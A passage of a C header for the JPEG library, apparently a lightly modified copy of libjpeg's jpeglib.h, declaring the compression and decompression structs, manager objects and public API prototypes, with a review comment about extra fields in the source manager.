#ifndef JDCT_FASTEST /* may be overridden in jconfig.h */
#define JDCT_FASTEST JDCT_IFAST
#endif
/* Dithering options for decompression (used only when quantizing colors). */
typedef enum {
JDITHER_NONE, /* no dithering */
JDITHER_ORDERED, /* simple ordered dither */
JDITHER_FS /* Floyd-Steinberg error diffusion dither */
} J_DITHER_MODE;
/* Common fields between JPEG compression and decompression master structs.
* This macro is expanded as the first members of both master structs, so
* code that only needs the shared part can work through j_common_ptr.
*/
#define jpeg_common_fields \
struct jpeg_error_mgr * err; /* Error handler module */\
struct jpeg_memory_mgr * mem; /* Memory manager module */\
struct jpeg_progress_mgr * progress; /* Progress monitor, or NULL if none */\
void * client_data; /* Available for use by application */\
boolean is_decompressor; /* So common code can tell which is which */\
int global_state /* For checking call sequence validity */
/* Routines that are to be used by both halves of the library are declared
* to receive a pointer to this structure. There are no actual instances of
* jpeg_common_struct, only of jpeg_compress_struct and jpeg_decompress_struct.
*/
struct jpeg_common_struct {
jpeg_common_fields; /* Fields common to both master struct types */
/* Additional fields follow in an actual jpeg_compress_struct or
* jpeg_decompress_struct. All three structs must agree on these
* initial fields! (This would be a lot cleaner in C++.)
*/
};
/* Handle types used throughout the public API. */
typedef struct jpeg_common_struct * j_common_ptr;
typedef struct jpeg_compress_struct * j_compress_ptr;
typedef struct jpeg_decompress_struct * j_decompress_ptr;
/* Master record for a compression instance.
* Field layout is part of the library ABI; do not reorder or remove fields.
*/
struct jpeg_compress_struct
{
jpeg_common_fields; /* Fields shared with jpeg_decompress_struct */
/* Destination for compressed data */
struct jpeg_destination_mgr * dest;
/* Description of source image --- these fields must be filled in by
* outer application before starting compression. in_color_space must
* be correct before you can even call jpeg_set_defaults().
*/
JDIMENSION image_width; /* input image width */
JDIMENSION image_height; /* input image height */
int input_components; /* # of color components in input image */
J_COLOR_SPACE in_color_space; /* colorspace of input image */
double input_gamma; /* image gamma of input image */
/* Compression parameters --- these fields must be set before calling
* jpeg_start_compress(). We recommend calling jpeg_set_defaults() to
* initialize everything to reasonable defaults, then changing anything
* the application specifically wants to change. That way you won't get
* burnt when new parameters are added. Also note that there are several
* helper routines to simplify changing parameters.
*/
int data_precision; /* bits of precision in image data */
int num_components; /* # of color components in JPEG image */
J_COLOR_SPACE jpeg_color_space; /* colorspace of JPEG image */
jpeg_component_info * comp_info;
/* comp_info[i] describes component that appears i'th in SOF */
JQUANT_TBL * quant_tbl_ptrs[NUM_QUANT_TBLS];
/* ptrs to coefficient quantization tables, or NULL if not defined */
JHUFF_TBL * dc_huff_tbl_ptrs[NUM_HUFF_TBLS];
JHUFF_TBL * ac_huff_tbl_ptrs[NUM_HUFF_TBLS];
/* ptrs to Huffman coding tables, or NULL if not defined */
UINT8 arith_dc_L[NUM_ARITH_TBLS]; /* L values for DC arith-coding tables */
UINT8 arith_dc_U[NUM_ARITH_TBLS]; /* U values for DC arith-coding tables */
UINT8 arith_ac_K[NUM_ARITH_TBLS]; /* Kx values for AC arith-coding tables */
int num_scans; /* # of entries in scan_info array */
const jpeg_scan_info * scan_info; /* script for multi-scan file, or NULL */
/* The default value of scan_info is NULL, which causes a single-scan
* sequential JPEG file to be emitted. To create a multi-scan file,
* set num_scans and scan_info to point to an array of scan definitions.
*/
boolean raw_data_in; /* TRUE=caller supplies downsampled data */
boolean arith_code; /* TRUE=arithmetic coding, FALSE=Huffman */
boolean optimize_coding; /* TRUE=optimize entropy encoding parms */
boolean CCIR601_sampling; /* TRUE=first samples are cosited */
int smoothing_factor; /* 1..100, or 0 for no input smoothing */
J_DCT_METHOD dct_method; /* DCT algorithm selector */
/* The restart interval can be specified in absolute MCUs by setting
* restart_interval, or in MCU rows by setting restart_in_rows
* (in which case the correct restart_interval will be figured
* for each scan).
*/
unsigned int restart_interval; /* MCUs per restart, or 0 for no restart */
int restart_in_rows; /* if > 0, MCU rows per restart interval */
/* Parameters controlling emission of special markers. */
boolean write_JFIF_header; /* should a JFIF marker be written? */
UINT8 JFIF_major_version; /* What to write for the JFIF version number */
UINT8 JFIF_minor_version;
/* These three values are not used by the JPEG code, merely copied */
/* into the JFIF APP0 marker. density_unit can be 0 for unknown, */
/* 1 for dots/inch, or 2 for dots/cm. Note that the pixel aspect */
/* ratio is defined by X_density/Y_density even when density_unit=0. */
UINT8 density_unit; /* JFIF code for pixel size units */
UINT16 X_density; /* Horizontal pixel density */
UINT16 Y_density; /* Vertical pixel density */
boolean write_Adobe_marker; /* should an Adobe marker be written? */
/* State variable: index of next scanline to be written to
* jpeg_write_scanlines(). Application may use this to control its
* processing loop, e.g., "while (next_scanline < image_height)".
*/
JDIMENSION next_scanline; /* 0 .. image_height-1 */
/* Remaining fields are known throughout compressor, but generally
* should not be touched by a surrounding application.
*/
/*
* These fields are computed during compression startup
*/
boolean progressive_mode; /* TRUE if scan script uses progressive mode */
int max_h_samp_factor; /* largest h_samp_factor */
int max_v_samp_factor; /* largest v_samp_factor */
JDIMENSION total_iMCU_rows; /* # of iMCU rows to be input to coef ctlr */
/* The coefficient controller receives data in units of MCU rows as defined
* for fully interleaved scans (whether the JPEG file is interleaved or not).
* There are v_samp_factor * DCTSIZE sample rows of each component in an
* "iMCU" (interleaved MCU) row.
*/
/*
* These fields are valid during any one scan.
* They describe the components and MCUs actually appearing in the scan.
*/
int comps_in_scan; /* # of JPEG components in this scan */
jpeg_component_info * cur_comp_info[MAX_COMPS_IN_SCAN];
/* *cur_comp_info[i] describes component that appears i'th in SOS */
JDIMENSION MCUs_per_row; /* # of MCUs across the image */
JDIMENSION MCU_rows_in_scan; /* # of MCU rows in the image */
int blocks_in_MCU; /* # of DCT blocks per MCU */
int MCU_membership[C_MAX_BLOCKS_IN_MCU];
/* MCU_membership[i] is index in cur_comp_info of component owning */
/* i'th block in an MCU */
int Ss, Se, Ah, Al; /* progressive JPEG parameters for scan */
/*
* Links to compression subobjects (methods and private variables of modules)
*/
struct jpeg_comp_master * master;
struct jpeg_c_main_controller * main;
struct jpeg_c_prep_controller * prep;
struct jpeg_c_coef_controller * coef;
struct jpeg_marker_writer * marker;
struct jpeg_color_converter * cconvert;
struct jpeg_downsampler * downsample;
struct jpeg_forward_dct * fdct;
struct jpeg_entropy_encoder * entropy;
jpeg_scan_info * script_space; /* workspace for jpeg_simple_progression */
int script_space_size;
};
/* Master record for a decompression instance.
* Field layout is part of the library ABI; do not reorder or remove fields.
*/
struct jpeg_decompress_struct
{
jpeg_common_fields; /* Fields shared with jpeg_compress_struct */
/* Source of compressed data */
struct jpeg_source_mgr * src;
/* Basic description of image --- filled in by jpeg_read_header(). */
/* Application may inspect these values to decide how to process image. */
JDIMENSION image_width; /* nominal image width (from SOF marker) */
JDIMENSION image_height; /* nominal image height */
int num_components; /* # of color components in JPEG image */
J_COLOR_SPACE jpeg_color_space; /* colorspace of JPEG image */
/* Decompression processing parameters --- these fields must be set before
* calling jpeg_start_decompress(). Note that jpeg_read_header() initializes
* them to default values.
*/
J_COLOR_SPACE out_color_space; /* colorspace for output */
unsigned int scale_num, scale_denom; /* fraction by which to scale image */
double output_gamma; /* image gamma wanted in output */
boolean buffered_image; /* TRUE=multiple output passes */
boolean raw_data_out; /* TRUE=downsampled data wanted */
J_DCT_METHOD dct_method; /* IDCT algorithm selector */
boolean do_fancy_upsampling; /* TRUE=apply fancy upsampling */
boolean do_block_smoothing; /* TRUE=apply interblock smoothing */
boolean quantize_colors; /* TRUE=colormapped output wanted */
/* the following are ignored if not quantize_colors: */
J_DITHER_MODE dither_mode; /* type of color dithering to use */
boolean two_pass_quantize; /* TRUE=use two-pass color quantization */
int desired_number_of_colors; /* max # colors to use in created colormap */
/* these are significant only in buffered-image mode: */
boolean enable_1pass_quant; /* enable future use of 1-pass quantizer */
boolean enable_external_quant;/* enable future use of external colormap */
boolean enable_2pass_quant; /* enable future use of 2-pass quantizer */
/* Description of actual output image that will be returned to application.
* These fields are computed by jpeg_start_decompress().
* You can also use jpeg_calc_output_dimensions() to determine these values
* in advance of calling jpeg_start_decompress().
*/
JDIMENSION output_width; /* scaled image width */
JDIMENSION output_height; /* scaled image height */
int out_color_components; /* # of color components in out_color_space */
int output_components; /* # of color components returned */
/* output_components is 1 (a colormap index) when quantizing colors;
* otherwise it equals out_color_components.
*/
int rec_outbuf_height; /* min recommended height of scanline buffer */
/* If the buffer passed to jpeg_read_scanlines() is less than this many rows
* high, space and time will be wasted due to unnecessary data copying.
* Usually rec_outbuf_height will be 1 or 2, at most 4.
*/
/* When quantizing colors, the output colormap is described by these fields.
* The application can supply a colormap by setting colormap non-NULL before
* calling jpeg_start_decompress; otherwise a colormap is created during
* jpeg_start_decompress or jpeg_start_output.
* The map has out_color_components rows and actual_number_of_colors columns.
*/
int actual_number_of_colors; /* number of entries in use */
JSAMPARRAY colormap; /* The color map as a 2-D pixel array */
/* State variables: these variables indicate the progress of decompression.
* The application may examine these but must not modify them.
*/
/* Row index of next scanline to be read from jpeg_read_scanlines().
* Application may use this to control its processing loop, e.g.,
* "while (output_scanline < output_height)".
*/
JDIMENSION output_scanline; /* 0 .. output_height-1 */
/* Current input scan number and number of iMCU rows completed in scan.
* These indicate the progress of the decompressor input side.
*/
int input_scan_number; /* Number of SOS markers seen so far */
JDIMENSION input_iMCU_row; /* Number of iMCU rows completed */
/* The "output scan number" is the notional scan being displayed by the
* output side. The decompressor will not allow output scan/row number
* to get ahead of input scan/row, but it can fall arbitrarily far behind.
*/
int output_scan_number; /* Nominal scan number being displayed */
JDIMENSION output_iMCU_row; /* Number of iMCU rows read */
/* Current progression status. coef_bits[c][i] indicates the precision
* with which component c's DCT coefficient i (in zigzag order) is known.
* It is -1 when no data has yet been received, otherwise it is the point
* transform (shift) value for the most recent scan of the coefficient
* (thus, 0 at completion of the progression).
* This pointer is NULL when reading a non-progressive file.
*/
int (*coef_bits)[DCTSIZE2]; /* -1 or current Al value for each coef */
/* Internal JPEG parameters --- the application usually need not look at
* these fields. Note that the decompressor output side may not use
* any parameters that can change between scans.
*/
/* Quantization and Huffman tables are carried forward across input
* datastreams when processing abbreviated JPEG datastreams.
*/
JQUANT_TBL * quant_tbl_ptrs[NUM_QUANT_TBLS];
/* ptrs to coefficient quantization tables, or NULL if not defined */
JHUFF_TBL * dc_huff_tbl_ptrs[NUM_HUFF_TBLS];
JHUFF_TBL * ac_huff_tbl_ptrs[NUM_HUFF_TBLS];
/* ptrs to Huffman coding tables, or NULL if not defined */
/* These parameters are never carried across datastreams, since they
* are given in SOF/SOS markers or defined to be reset by SOI.
*/
int data_precision; /* bits of precision in image data */
jpeg_component_info * comp_info;
/* comp_info[i] describes component that appears i'th in SOF */
boolean progressive_mode; /* TRUE if SOFn specifies progressive mode */
boolean arith_code; /* TRUE=arithmetic coding, FALSE=Huffman */
UINT8 arith_dc_L[NUM_ARITH_TBLS]; /* L values for DC arith-coding tables */
UINT8 arith_dc_U[NUM_ARITH_TBLS]; /* U values for DC arith-coding tables */
UINT8 arith_ac_K[NUM_ARITH_TBLS]; /* Kx values for AC arith-coding tables */
unsigned int restart_interval; /* MCUs per restart interval, or 0 for no restart */
/* These fields record data obtained from optional markers recognized by
* the JPEG library.
*/
boolean saw_JFIF_marker; /* TRUE iff a JFIF APP0 marker was found */
/* Data copied from JFIF marker; only valid if saw_JFIF_marker is TRUE: */
UINT8 JFIF_major_version; /* JFIF version number */
UINT8 JFIF_minor_version;
UINT8 density_unit; /* JFIF code for pixel size units */
UINT16 X_density; /* Horizontal pixel density */
UINT16 Y_density; /* Vertical pixel density */
boolean saw_Adobe_marker; /* TRUE iff an Adobe APP14 marker was found */
UINT8 Adobe_transform; /* Color transform code from Adobe marker */
boolean CCIR601_sampling; /* TRUE=first samples are cosited */
/* Aside from the specific data retained from APPn markers known to the
* library, the uninterpreted contents of any or all APPn and COM markers
* can be saved in a list for examination by the application.
*/
jpeg_saved_marker_ptr marker_list; /* Head of list of saved markers */
/* Remaining fields are known throughout decompressor, but generally
* should not be touched by a surrounding application.
*/
/*
* These fields are computed during decompression startup
*/
int max_h_samp_factor; /* largest h_samp_factor */
int max_v_samp_factor; /* largest v_samp_factor */
int min_DCT_scaled_size; /* smallest DCT_scaled_size of any component */
JDIMENSION total_iMCU_rows; /* # of iMCU rows in image */
/* The coefficient controller's input and output progress is measured in
* units of "iMCU" (interleaved MCU) rows. These are the same as MCU rows
* in fully interleaved JPEG scans, but are used whether the scan is
* interleaved or not. We define an iMCU row as v_samp_factor DCT block
* rows of each component. Therefore, the IDCT output contains
* v_samp_factor*DCT_scaled_size sample rows of a component per iMCU row.
*/
JSAMPLE * sample_range_limit; /* table for fast range-limiting */
/*
* These fields are valid during any one scan.
* They describe the components and MCUs actually appearing in the scan.
* Note that the decompressor output side must not use these fields.
*/
int comps_in_scan; /* # of JPEG components in this scan */
jpeg_component_info * cur_comp_info[MAX_COMPS_IN_SCAN];
/* *cur_comp_info[i] describes component that appears i'th in SOS */
JDIMENSION MCUs_per_row; /* # of MCUs across the image */
JDIMENSION MCU_rows_in_scan; /* # of MCU rows in the image */
int blocks_in_MCU; /* # of DCT blocks per MCU */
int MCU_membership[D_MAX_BLOCKS_IN_MCU];
/* MCU_membership[i] is index in cur_comp_info of component owning */
/* i'th block in an MCU */
int Ss, Se, Ah, Al; /* progressive JPEG parameters for scan */
/* This field is shared between entropy decoder and marker parser.
* It is either zero or the code of a JPEG marker that has been
* read from the data source, but has not yet been processed.
*/
int unread_marker;
/*
* Links to decompression subobjects (methods, private variables of modules)
*/
struct jpeg_decomp_master * master;
struct jpeg_d_main_controller * main;
struct jpeg_d_coef_controller * coef;
struct jpeg_d_post_controller * post;
struct jpeg_input_controller * inputctl;
struct jpeg_marker_reader * marker;
struct jpeg_entropy_decoder * entropy;
struct jpeg_inverse_dct * idct;
struct jpeg_upsampler * upsample;
struct jpeg_color_deconverter * cconvert;
struct jpeg_color_quantizer * cquantize;
};
/* "Object" declarations for JPEG modules that may be supplied or called
* directly by the surrounding application.
* As with all objects in the JPEG library, these structs only define the
* publicly visible methods and state variables of a module. Additional
* private fields may exist after the public ones.
*/
/* Error handler object.
* Applications typically install this via jpeg_std_error() and may override
* individual method pointers (most commonly error_exit).
*/
struct jpeg_error_mgr {
/* Error exit handler: does not return to caller */
JMETHOD(void, error_exit, (j_common_ptr cinfo));
/* Conditionally emit a trace or warning message */
JMETHOD(void, emit_message, (j_common_ptr cinfo, int msg_level));
/* Routine that actually outputs a trace or error message */
JMETHOD(void, output_message, (j_common_ptr cinfo));
/* Format a message string for the most recent JPEG error or message */
JMETHOD(void, format_message, (j_common_ptr cinfo, char * buffer));
#define JMSG_LENGTH_MAX 200 /* recommended size of format_message buffer */
/* Reset error state variables at start of a new image */
JMETHOD(void, reset_error_mgr, (j_common_ptr cinfo));
/* The message ID code and any parameters are saved here.
* A message can have one string parameter or up to 8 int parameters.
*/
int msg_code;
#define JMSG_STR_PARM_MAX 80
union {
int i[8];
char s[JMSG_STR_PARM_MAX];
} msg_parm;
/* Standard state variables for error facility */
int trace_level; /* max msg_level that will be displayed */
/* For recoverable corrupt-data errors, we emit a warning message,
* but keep going unless emit_message chooses to abort. emit_message
* should count warnings in num_warnings. The surrounding application
* can check for bad data by seeing if num_warnings is nonzero at the
* end of processing.
*/
long num_warnings; /* number of corrupt-data warnings */
/* These fields point to the table(s) of error message strings.
* An application can change the table pointer to switch to a different
* message list (typically, to change the language in which errors are
* reported). Some applications may wish to add additional error codes
* that will be handled by the JPEG library error mechanism; the second
* table pointer is used for this purpose.
*
* First table includes all errors generated by JPEG library itself.
* Error code 0 is reserved for a "no such error string" message.
*/
const char * const * jpeg_message_table; /* Library errors */
int last_jpeg_message; /* Table contains strings 0..last_jpeg_message */
/* Second table can be added by application (see cjpeg/djpeg for example).
* It contains strings numbered first_addon_message..last_addon_message.
*/
const char * const * addon_message_table; /* Non-library errors */
int first_addon_message; /* code for first string in addon table */
int last_addon_message; /* code for last string in addon table */
};
/* Progress monitor object.
* Overall progress fraction is
* (completed_passes + pass_counter/pass_limit) / total_passes.
*/
struct jpeg_progress_mgr {
JMETHOD(void, progress_monitor, (j_common_ptr cinfo));
long pass_counter; /* work units completed in this pass */
long pass_limit; /* total number of work units in this pass */
int completed_passes; /* passes completed so far */
int total_passes; /* total number of passes expected */
};
/* Data destination object for compression.
* The compressor writes into the buffer described by next_output_byte /
* free_in_buffer and calls the method pointers to manage it.
*/
struct jpeg_destination_mgr {
JOCTET * next_output_byte; /* => next byte to write in buffer */
size_t free_in_buffer; /* # of byte spaces remaining in buffer */
JMETHOD(void, init_destination, (j_compress_ptr cinfo));
JMETHOD(boolean, empty_output_buffer, (j_compress_ptr cinfo));
JMETHOD(void, term_destination, (j_compress_ptr cinfo));
};
/* Data source object for decompression.
* NOTE(review): the infile/buffer/start_of_file fields are not part of the
* stock IJG jpeg_source_mgr (they normally live in the private source
* manager defined in jdatasrc.c); presumably they were merged into the
* public struct deliberately in this copy -- confirm against callers
* before relying on them.
*/
typedef struct jpeg_source_mgr
{
FILE * infile; /* source stream */
JOCTET * buffer; /* start of buffer */
boolean start_of_file; /* have we gotten any data yet? */
const JOCTET * next_input_byte; /* => next byte to read from buffer */
size_t bytes_in_buffer; /* # of bytes remaining in buffer */
JMETHOD(void, init_source, (j_decompress_ptr cinfo));
JMETHOD(boolean, fill_input_buffer, (j_decompress_ptr cinfo));
JMETHOD(void, skip_input_data, (j_decompress_ptr cinfo, long num_bytes));
JMETHOD(boolean, resync_to_restart, (j_decompress_ptr cinfo, int desired));
JMETHOD(void, term_source, (j_decompress_ptr cinfo));
} jpeg_source_mgr;
/* Memory manager object.
* Allocates "small" objects (a few K total), "large" objects (tens of K),
* and "really big" objects (virtual arrays with backing store if needed).
* The memory manager does not allow individual objects to be freed; rather,
* each created object is assigned to a pool, and whole pools can be freed
* at once. This is faster and more convenient than remembering exactly what
* to free, especially where malloc()/free() are not too speedy.
* NB: alloc routines never return NULL. They exit to error_exit if not
* successful.
*/
#define JPOOL_PERMANENT 0 /* lasts until master record is destroyed */
#define JPOOL_IMAGE 1 /* lasts until done with image/datastream */
#define JPOOL_NUMPOOLS 2
/* Opaque handles for virtual (possibly disk-backed) sample/block arrays. */
typedef struct jvirt_sarray_control * jvirt_sarray_ptr;
typedef struct jvirt_barray_control * jvirt_barray_ptr;
struct jpeg_memory_mgr {
/* Method pointers */
JMETHOD(void *, alloc_small, (j_common_ptr cinfo, int pool_id,
size_t sizeofobject));
JMETHOD(void FAR *, alloc_large, (j_common_ptr cinfo, int pool_id,
size_t sizeofobject));
JMETHOD(JSAMPARRAY, alloc_sarray, (j_common_ptr cinfo, int pool_id,
JDIMENSION samplesperrow,
JDIMENSION numrows));
JMETHOD(JBLOCKARRAY, alloc_barray, (j_common_ptr cinfo, int pool_id,
JDIMENSION blocksperrow,
JDIMENSION numrows));
JMETHOD(jvirt_sarray_ptr, request_virt_sarray, (j_common_ptr cinfo,
int pool_id,
boolean pre_zero,
JDIMENSION samplesperrow,
JDIMENSION numrows,
JDIMENSION maxaccess));
JMETHOD(jvirt_barray_ptr, request_virt_barray, (j_common_ptr cinfo,
int pool_id,
boolean pre_zero,
JDIMENSION blocksperrow,
JDIMENSION numrows,
JDIMENSION maxaccess));
JMETHOD(void, realize_virt_arrays, (j_common_ptr cinfo));
JMETHOD(JSAMPARRAY, access_virt_sarray, (j_common_ptr cinfo,
jvirt_sarray_ptr ptr,
JDIMENSION start_row,
JDIMENSION num_rows,
boolean writable));
JMETHOD(JBLOCKARRAY, access_virt_barray, (j_common_ptr cinfo,
jvirt_barray_ptr ptr,
JDIMENSION start_row,
JDIMENSION num_rows,
boolean writable));
JMETHOD(void, free_pool, (j_common_ptr cinfo, int pool_id));
JMETHOD(void, self_destruct, (j_common_ptr cinfo));
/* Limit on memory allocation for this JPEG object. (Note that this is
* merely advisory, not a guaranteed maximum; it only affects the space
* used for virtual-array buffers.) May be changed by outer application
* after creating the JPEG object.
*/
long max_memory_to_use;
/* Maximum allocation request accepted by alloc_large. */
long max_alloc_chunk;
};
/* Routine signature for application-supplied marker processing methods.
* Need not pass marker code since it is stored in cinfo->unread_marker.
* (Install via jpeg_set_marker_processor.)
*/
typedef JMETHOD(boolean, jpeg_marker_parser_method, (j_decompress_ptr cinfo));
/* Declarations for routines called by application.
* The JPP macro hides prototype parameters from compilers that can't cope.
* Note JPP requires double parentheses.
*/
#ifdef HAVE_PROTOTYPES
#define JPP(arglist) arglist
#else
#define JPP(arglist) ()
#endif
/* Short forms of external names for systems with brain-damaged linkers.
* We shorten external names to be unique in the first six letters, which
* is good enough for all known systems.
* (If your compiler itself needs names to be unique in less than 15
* characters, you are out of luck. Get a better compiler.)
* Each macro maps a public API name onto its abbreviated link-time name.
*/
#ifdef NEED_SHORT_EXTERNAL_NAMES
#define jpeg_std_error jStdError
#define jpeg_CreateCompress jCreaCompress
#define jpeg_CreateDecompress jCreaDecompress
#define jpeg_destroy_compress jDestCompress
#define jpeg_destroy_decompress jDestDecompress
#define jpeg_stdio_dest jStdDest
#define jpeg_stdio_src jStdSrc
#define jpeg_set_defaults jSetDefaults
#define jpeg_set_colorspace jSetColorspace
#define jpeg_default_colorspace jDefColorspace
#define jpeg_set_quality jSetQuality
#define jpeg_set_linear_quality jSetLQuality
#define jpeg_add_quant_table jAddQuantTable
#define jpeg_quality_scaling jQualityScaling
#define jpeg_simple_progression jSimProgress
#define jpeg_suppress_tables jSuppressTables
#define jpeg_alloc_quant_table jAlcQTable
#define jpeg_alloc_huff_table jAlcHTable
#define jpeg_start_compress jStrtCompress
#define jpeg_write_scanlines jWrtScanlines
#define jpeg_finish_compress jFinCompress
#define jpeg_write_raw_data jWrtRawData
#define jpeg_write_marker jWrtMarker
#define jpeg_write_m_header jWrtMHeader
#define jpeg_write_m_byte jWrtMByte
#define jpeg_write_tables jWrtTables
#define jpeg_read_header jReadHeader
#define jpeg_start_decompress jStrtDecompress
#define jpeg_read_scanlines jReadScanlines
#define jpeg_finish_decompress jFinDecompress
#define jpeg_read_raw_data jReadRawData
#define jpeg_has_multiple_scans jHasMultScn
#define jpeg_start_output jStrtOutput
#define jpeg_finish_output jFinOutput
#define jpeg_input_complete jInComplete
#define jpeg_new_colormap jNewCMap
#define jpeg_consume_input jConsumeInput
#define jpeg_calc_output_dimensions jCalcDimensions
#define jpeg_save_markers jSaveMarkers
#define jpeg_set_marker_processor jSetMarker
#define jpeg_read_coefficients jReadCoefs
#define jpeg_write_coefficients jWrtCoefs
#define jpeg_copy_critical_parameters jCopyCrit
#define jpeg_abort_compress jAbrtCompress
#define jpeg_abort_decompress jAbrtDecompress
#define jpeg_abort jAbort
#define jpeg_destroy jDestroy
#define jpeg_resync_to_restart jResyncRestart
#endif /* NEED_SHORT_EXTERNAL_NAMES */
/* Default error-management setup */
EXTERN(struct jpeg_error_mgr *) jpeg_std_error
JPP((struct jpeg_error_mgr * err));
/* Initialization of JPEG compression objects.
* jpeg_create_compress() and jpeg_create_decompress() are the exported
* names that applications should call. These expand to calls on
* jpeg_CreateCompress and jpeg_CreateDecompress with additional information
* passed for version mismatch checking.
* NB: you must set up the error-manager BEFORE calling jpeg_create_xxx.
*/
#define jpeg_create_compress(cinfo) \
jpeg_CreateCompress((cinfo), JPEG_LIB_VERSION, \
(size_t) sizeof(struct jpeg_compress_struct))
#define jpeg_create_decompress(cinfo) \
jpeg_CreateDecompress((cinfo), JPEG_LIB_VERSION, \
(size_t) sizeof(struct jpeg_decompress_struct))
EXTERN(void) jpeg_CreateCompress JPP((j_compress_ptr cinfo,
int version, size_t structsize));
EXTERN(void) jpeg_CreateDecompress JPP((j_decompress_ptr cinfo,
int version, size_t structsize));
/* Destruction of JPEG compression objects */
EXTERN(void) jpeg_destroy_compress JPP((j_compress_ptr cinfo));
EXTERN(void) jpeg_destroy_decompress JPP((j_decompress_ptr cinfo));
/* Standard data source and destination managers: stdio streams. */
/* Caller is responsible for opening the file before and closing after. */
EXTERN(void) jpeg_stdio_dest JPP((j_compress_ptr cinfo, FILE * outfile));
EXTERN(void) jpeg_stdio_src JPP((j_decompress_ptr cinfo, FILE * infile));
/* Default parameter setup for compression */
EXTERN(void) jpeg_set_defaults JPP((j_compress_ptr cinfo));
/* Compression parameter setup aids */
EXTERN(void) jpeg_set_colorspace JPP((j_compress_ptr cinfo,
J_COLOR_SPACE colorspace));
EXTERN(void) jpeg_default_colorspace JPP((j_compress_ptr cinfo));
EXTERN(void) jpeg_set_quality JPP((j_compress_ptr cinfo, int quality,
boolean force_baseline));
EXTERN(void) jpeg_set_linear_quality JPP((j_compress_ptr cinfo,
int scale_factor,
boolean force_baseline));
EXTERN(void) jpeg_add_quant_table JPP((j_compress_ptr cinfo, int which_tbl,
const unsigned int *basic_table,
int scale_factor,
boolean force_baseline));
EXTERN(int) jpeg_quality_scaling JPP((int quality));
EXTERN(void) jpeg_simple_progression JPP((j_compress_ptr cinfo));
EXTERN(void) jpeg_suppress_tables JPP((j_compress_ptr cinfo,
boolean suppress));
EXTERN(JQUANT_TBL *) jpeg_alloc_quant_table JPP((j_common_ptr cinfo));
EXTERN(JHUFF_TBL *) jpeg_alloc_huff_table JPP((j_common_ptr cinfo));
/* Main entry points for compression */
EXTERN(void) jpeg_start_compress JPP((j_compress_ptr cinfo,
boolean write_all_tables));
EXTERN(JDIMENSION) jpeg_write_scanlines JPP((j_compress_ptr cinfo,
JSAMPARRAY scanlines,
JDIMENSION num_lines));
EXTERN(void) jpeg_finish_compress JPP((j_compress_ptr cinfo));
/* Replaces jpeg_write_scanlines when writing raw downsampled data. */
EXTERN(JDIMENSION) jpeg_write_raw_data JPP((j_compress_ptr cinfo,
JSAMPIMAGE data,
JDIMENSION num_lines));
/* Write a special marker. See libjpeg.doc concerning safe usage. */
EXTERN(void) jpeg_write_marker
JPP((j_compress_ptr cinfo, int marker,
const JOCTET * dataptr, unsigned int datalen));
/* Same, but piecemeal. */
EXTERN(void) jpeg_write_m_header
JPP((j_compress_ptr cinfo, int marker, unsigned int datalen));
EXTERN(void) jpeg_write_m_byte
JPP((j_compress_ptr cinfo, int val));
/* Alternate compression function: just write an abbreviated table file */
EXTERN(void) jpeg_write_tables JPP((j_compress_ptr cinfo));
/* Decompression startup: read start of JPEG datastream to see what's there */
EXTERN(int) jpeg_read_header JPP((j_decompress_ptr cinfo,
boolean require_image));
/* Return value is one of: */
#define JPEG_SUSPENDED 0 /* Suspended due to lack of input data */
#define JPEG_HEADER_OK 1 /* Found valid image datastream */
#define JPEG_HEADER_TABLES_ONLY 2 /* Found valid table-specs-only datastream */
/* If you pass require_image = TRUE (normal case), you need not check for
* a TABLES_ONLY return code; an abbreviated file will cause an error exit.
* JPEG_SUSPENDED is only possible if you use a data source module that can
* give a suspension return (the stdio source module doesn't).
*/
/* Main entry points for decompression */
EXTERN(boolean) jpeg_start_decompress JPP((j_decompress_ptr cinfo));
EXTERN(JDIMENSION) jpeg_read_scanlines JPP((j_decompress_ptr cinfo,
JSAMPARRAY scanlines,
JDIMENSION max_lines));
EXTERN(boolean) jpeg_finish_decompress JPP((j_decompress_ptr cinfo));
/* Replaces jpeg_read_scanlines when reading raw downsampled data. */
EXTERN(JDIMENSION) jpeg_read_raw_data JPP((j_decompress_ptr cinfo,
JSAMPIMAGE data,
JDIMENSION max_lines));
/* Additional entry points for buffered-image mode. */
EXTERN(boolean) jpeg_has_multiple_scans JPP((j_decompress_ptr cinfo));
EXTERN(boolean) jpeg_start_output JPP((j_decompress_ptr cinfo,
int scan_number));
EXTERN(boolean) jpeg_finish_output JPP((j_decompress_ptr cinfo));
EXTERN(boolean) jpeg_input_complete JPP((j_decompress_ptr cinfo));
EXTERN(void) jpeg_new_colormap JPP((j_decompress_ptr cinfo));
EXTERN(int) jpeg_consume_input JPP((j_decompress_ptr cinfo));
/* Return value is one of: */
/* #define JPEG_SUSPENDED 0 Suspended due to lack of input data */
#define JPEG_REACHED_SOS 1 /* Reached start of new scan */
#define JPEG_REACHED_EOI 2 /* Reached end of image */
#define JPEG_ROW_COMPLETED 3 /* Completed one iMCU row */
#define JPEG_SCAN_COMPLETED 4 /* Completed last iMCU row of a scan */
/* Precalculate output dimensions for current decompression parameters. */
EXTERN(void) jpeg_calc_output_dimensions JPP((j_decompress_ptr cinfo));
/* Control saving of COM and APPn markers into marker_list. */
EXTERN(void) jpeg_save_markers
JPP((j_decompress_ptr cinfo, int marker_code,
unsigned int length_limit));
/* Install a special processing method for COM or APPn markers. */
EXTERN(void) jpeg_set_marker_processor
JPP((j_decompress_ptr cinfo, int marker_code,
jpeg_marker_parser_method routine));
/* Read or write raw DCT coefficients --- useful for lossless transcoding. */
EXTERN(jvirt_barray_ptr *) jpeg_read_coefficients JPP((j_decompress_ptr cinfo));
EXTERN(void) jpeg_write_coefficients JPP((j_compress_ptr cinfo,
jvirt_barray_ptr * coef_arrays));
EXTERN(void) jpeg_copy_critical_parameters JPP((j_decompress_ptr srcinfo,
j_compress_ptr dstinfo));
/* If you choose to abort compression or decompression before completing
* jpeg_finish_(de)compress, then you need to clean up to release memory,
* temporary files, etc. You can just call jpeg_destroy_(de)compress
* if you're done with the JPEG object, but if you want to clean it up and
* reuse it, call this:
*/
EXTERN(void) jpeg_abort_compress JPP((j_compress_ptr cinfo));
EXTERN(void) jpeg_abort_decompress JPP((j_decompress_ptr cinfo));
EXTERN(void)default_decompress_parms JPP((j_decompress_ptr cinfo));
/* Generic versions of jpeg_abort and jpeg_destroy that work on either
* flavor of JPEG object. These may be more convenient in some places.
*/
EXTERN(void) jpeg_abort JPP((j_common_ptr cinfo));
EXTERN(void) jpeg_destroy JPP((j_common_ptr cinfo));
/* Default restart-marker-resync procedure for use by data source modules */
